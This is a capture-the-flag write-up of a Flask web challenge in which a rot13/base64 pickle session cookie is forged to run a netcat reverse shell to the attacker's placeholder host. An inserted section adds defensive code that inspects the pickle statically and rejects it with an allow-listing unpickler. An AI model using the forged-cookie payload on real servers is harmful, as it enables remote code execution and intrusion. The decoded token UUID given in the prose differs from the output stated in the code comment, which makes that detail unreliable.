Dolla Dolla Dillz Writeup by Srdnlen
Category: WEB. Solves: 8 Points: 200
made by: ollien
Note: cataas.com is NOT part of this challenge
The website looks pretty simple on the frontend: a login form and a registration form. We tried some injections in both, but they didn't work; after logging in we get a random image and nothing interesting. The cookies are more interesting: after we register, a cookie is set that then disappears when we are redirected to the login form with a "registration successful" message.
From this cookie we understand that Flask is running in the backend, which matters later.
Then we log in and another cookie is set: a token that looks like base64. After some attempts, and with the help of previous years' writeups, we discover that it is a base64 string with rot13 applied on top. After decoding it (rot13 first, then base64) we obtain this:
cdbal Session q)q}qXtokenqX$bb05b8da-82f1-11ea-a968-0242ac120003qsb.
So we have some readable strings (dbal, Session, token and a UUID), enough to start googling about dbal, Python and session tokens. After a while we find that this is Python's pickle format: the leading `c` is the GLOBAL opcode that imports dbal.Session, and unpickling untrusted data lets that data pick which callable gets invoked, the Python counterpart of the better-known PHP deserialization bugs.
Knowing this we try to deserialize the cookie so that we can analyze the object, but pickle.loads() needs to import a module named dbal containing a class Session (the Python runtime errors tell us exactly which name is missing). Once we have a stub module and pickle.loads(cookie) works, we can also give our own Session class a
<code>__reduce__</code> method, which tells pickle to call any callable we choose with arguments we choose, so the server's pickle.loads() executes our command. First we try a simple "ls", but since the website gives no visual feedback we cannot tell whether it ran, so we go for a reverse shell instead. To do that we use the following Python scripts to create the cookie we need:
```python
# dbal.py: stand-in for the server's dbal module. The class name must match the
# one in the cookie (dbal.Session) so pickle.loads() can resolve it; __reduce__
# makes the server's unpickler call os.system() with our reverse shell command.
import os


class Session:
    def __reduce__(self):
        # your_ip and port are placeholders for the listener; this nc needs the -e option
        return (os.system, ('nc your_ip port -e /bin/bash',))
```

```python
import base64
import pickle
from codecs import encode

import dbal  # the module above; it must be importable for pickle.loads() to resolve dbal.Session


def rot13(s):
    return encode(s, 'rot13')


token = "tNAwMTWuoNcGMKAmnJ9hPaRNXLSkNK1kNytSNNNNqT9eMJ5kN1txNNNNAGp5MQH5Z2RgBQR1Mv0kZJIuYJSxAwLgZQV0ZzSwZGVjZQNmpDEmLv4="
# the cookie is rot13(base64(pickle)), so undo both layers
based = base64.b64decode(rot13(token))
pickled = pickle.loads(based)  # a dbal.Session instance carrying the token attribute
print(pickled)
# re-pickling goes through our __reduce__, so the new cookie carries the os.system call
pickled2 = rot13(base64.b64encode(pickle.dumps(pickled)).decode())
print(pickled2)
```
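The scripts above need a dummy dbal module and actually unpickle the cookie to look at it. The following is an added example, not part of the original writeup or of the challenge code, that shows a safer way to do the same analysis and the defensive side of the same bug: it inspects the cookie with pickletools (opcodes are parsed, not executed), builds the same kind of __reduce__ payload, and then shows how a find_class allow-list rejects that payload before os.system is ever resolved. The token is the one from the writeup; the local Session class is an assumed stand-in for the server's dbal.Session (the real class is not on the page), and the "id" command and function names are ours.

```python
import base64
import codecs
import io
import os
import pickle
import pickletools

# Session cookie copied from the writeup: rot13 applied to base64 of a pickle.
PAGE_TOKEN = ("tNAwMTWuoNcGMKAmnJ9hPaRNXLSkNK1kNytSNNNNqT9eMJ5kN1txNNNN"
              "AGp5MQH5Z2RgBQR1Mv0kZJIuYJSxAwLgZQV0ZzSwZGVjZQNmpDEmLv4=")


def decode_token(token: str) -> bytes:
    """Undo the cookie wrapping: rot13 first, then base64, giving raw pickle bytes."""
    return base64.b64decode(codecs.encode(token, "rot13"))


def encode_token(raw: bytes) -> str:
    """Inverse of decode_token: base64 the pickle, then rot13 the text."""
    return codecs.encode(base64.b64encode(raw).decode("ascii"), "rot13")


def referenced_globals(raw: bytes) -> list:
    """Statically list every (module, name) the pickle would import.

    pickletools.genops only parses opcodes; nothing is executed, so this is safe
    to run on a hostile cookie. Handles GLOBAL (protocol <= 3, as in the page's
    token) and STACK_GLOBAL (protocol >= 4, where module and name are the two
    string pushes immediately before the opcode).
    """
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(raw):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class Session:
    """Local stand-in for the server's dbal.Session (assumed to be a plain
    attribute holder; the real class is not on the page)."""


class RestrictedUnpickler(pickle.Unpickler):
    """Defensive counterpart: only an allow-listed global may be resolved.

    find_class runs when the GLOBAL/STACK_GLOBAL opcode executes, i.e. before
    REDUCE, so a payload naming os.system is rejected before it can be called.
    """
    ALLOWED = {("dbal", "Session"): Session}

    def find_class(self, module, name):
        try:
            return self.ALLOWED[(module, name)]
        except KeyError:
            raise pickle.UnpicklingError(f"refusing to import {module}.{name}") from None


def load_session(token: str):
    """Unpickle a cookie through the allow-listing unpickler."""
    return RestrictedUnpickler(io.BytesIO(decode_token(token))).load()


class EvilSession:
    """Attacker-side object: pickling it emits a REDUCE of os.system(cmd)."""
    def __init__(self, cmd: str):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def forge_token(cmd: str) -> str:
    """Build a cookie that would run cmd on a server doing a plain pickle.loads()."""
    return encode_token(pickle.dumps(EvilSession(cmd)))


def is_rejected(token: str) -> bool:
    """True if the allow-listing unpickler refuses the cookie (nothing in it runs)."""
    try:
        load_session(token)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    raw = decode_token(PAGE_TOKEN)
    pickletools.dis(raw)                              # full opcode listing of the cookie
    print(referenced_globals(raw))                    # [('dbal', 'Session')]
    print(load_session(PAGE_TOKEN).token)             # 579d593a-815f-11ea-ad66-0242ac120003
    forged = forge_token("id")
    print(referenced_globals(decode_token(forged)))   # os.system under its real module name
    print(is_rejected(forged))                        # True
```

Two points worth noting: pickle records os.system under the module it really lives in (posix on Linux), so a deny-list of module names is easy to miss; an allow-list in find_class is the only reliable check. And the check happens before any arguments are applied, so a payload refused this way never executes anything. The real fix for the challenge's bug is not to unpickle cookies at all but to use a signed, data-only serialization such as Flask's itsdangerous-signed sessions.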
So we generate a token that will execute our reverse shell when the server unpickles it.
We send it with Burp in place of the original session cookie, with a listener waiting on our host.
And we receive a reverse shell.